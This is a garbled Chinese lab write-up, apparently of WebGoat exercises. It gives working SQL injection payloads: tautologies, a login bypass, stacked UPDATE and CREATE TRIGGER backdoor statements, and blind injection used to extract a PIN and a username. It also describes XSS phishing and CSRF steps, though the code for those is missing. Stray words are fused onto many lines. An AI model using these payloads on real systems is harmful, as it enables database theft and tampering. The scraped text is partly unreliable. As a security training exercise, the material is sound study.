将原语句修改成:SELECT * FROM weather_data WHERE station = 101 OR 1=1html
因为1=1恒成立,点击go,看到全部城市的天气,成功。前端
其中%0d和%0a为CRLF换行符,看到的输出为java
第二行就是咱们刚刚伪造出来的web
cc' or 1=1 or 'a'='a正则表达式
SELECT * FROM user_data WHERE last_name = 'cc' OR '1'='1'sql
以用户Neville登陆,在密码栏中输入' or 1=1 --永真式进行SQL注入,可是发现登陆失败。发现password的最大长度为8,更改最大长度,将其改成100浏览器
再次登陆,成功安全
由于刷新了网页咱们须要从新修改最大字符长度服务器
将value值改成101 or 1=1 order by salary desc,这样老板的信息就会被排到第一个cookie
点击ViewProfile进去,便可查看老板的详细信息
图
输入注入语句:101; update employee set salary=65000,
101;CREATE TRIGGER yqhBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20154322@qq.com' WHERE userid = NEW.userid建立一个后门,把表中全部的邮箱和用户ID都设为个人。
先输入101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 4000);,结果是
Account number is valid.帐户有效,再试试先输入101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 4000);,结果是
Account number is valid.帐户有效,再试试
利用二分法,屡次尝试,找到数字为2364
输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) >'z' );进行猜解,发现结果为Account number is valid,帐户有效。再往大写的字母猜想,最终肯定首字母为J
重复上述步骤,最终肯定用户名为“Jill”
使用XSS和HTML插入制做一个钓鱼网站,将其输在search框中,代码以下:
输入后下拉网页,会有用户名和密码的框出现,随意输入用户名和密码
成功
输入带有攻击性的URL,如,就会弹出对话框
在 Message里输入
在Title输入:20154328,在Message输入:
点击“Submit”,在Message List下出现一条提交的记录,以下图所示:
在Title输入:20154328;在Message输入:
以下图所示:
在Message输入构造的代码
击Submit,而后在Message List里点击“CSRF Token By-Pass Attack”,以下图所示: